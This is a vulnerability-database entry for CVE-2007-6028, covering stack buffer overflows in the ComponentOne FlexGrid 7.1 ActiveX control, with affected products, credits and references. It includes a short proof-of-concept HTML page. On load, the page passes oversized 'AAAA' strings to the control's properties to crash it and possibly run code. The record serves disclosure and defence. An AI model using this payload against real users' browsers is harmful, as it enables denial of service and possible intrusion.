ID
VAR-E-200711-0135
CVE
| cve_id: | CVE-2007-6028 | Trust: 1.9 |
EDB ID
30772
TITLE
ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities - Windows remote Exploit
Trust: 0.6
DESCRIPTION
ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities. CVE-2007-6028CVE-41939 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | componentone | model: | flexgrid | scope: | eq | version: | 7.1 | Trust: 1.6 |
| vendor: | sap | model: | gui vsflexgrid active-x | scope: | - | version: | - | Trust: 0.5 |
| vendor: | componentone | model: | flexgrid light | scope: | eq | version: | 7.1 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/26467/info
ComponentOne FlexGrid ActiveX Control is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to adequately check boundaries on user-supplied input.
An attacker can exploit these issues to cause denial denial-of-service conditions and possibly to execute arbitrary code, but this has not been confirmed.
ComponentOne FlexGrid 7.1 Light is vulnerable; other versions may also be affected.
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 262145) s=s+s;
var obj = new ActiveXObject("VSFlexGrid.VSFlexGridL");
obj.Text = s;
obj.EditSelText = s;
obj.EditText = s;
obj.CellFontName = s;
}
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
ActiveX Control Multiple Buffer Overflow Vulnerabilities
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | overflow | Trust: 0.5 |
CREDITS
Elazar Broad
Trust: 0.6
EXTERNAL IDS
| db: | BID | id: | 26467 | Trust: 2.4 |
| db: | NVD | id: | CVE-2007-6028 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 30772 | Trust: 1.9 |
| db: | EDBNET | id: | 52395 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 81868 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2007-6028 | Trust: 1.6 |
| url: | https://www.securityfocus.com/bid/26467/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/30772/ | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/30772 | Trust: 0.3 |
| url: | http://support.microsoft.com/kb/240797 | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/10054 | Trust: 0.3 |
| url: | http://www.componentone.com/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 26467 |
| db: | PACKETSTORM | id: | 81868 |
| db: | EXPLOIT-DB | id: | 30772 |
| db: | EDBNET | id: | 52395 |
LAST UPDATE DATE
2022-07-27T09:20:17.737000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 26467 | date: | 2007-11-20T18:04:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 26467 | date: | 2007-11-15T00:00:00 |
| db: | PACKETSTORM | id: | 81868 | date: | 2009-10-08T02:01:45 |
| db: | EXPLOIT-DB | id: | 30772 | date: | 2007-11-15T00:00:00 |
| db: | EDBNET | id: | 52395 | date: | 2007-11-15T00:00:00 |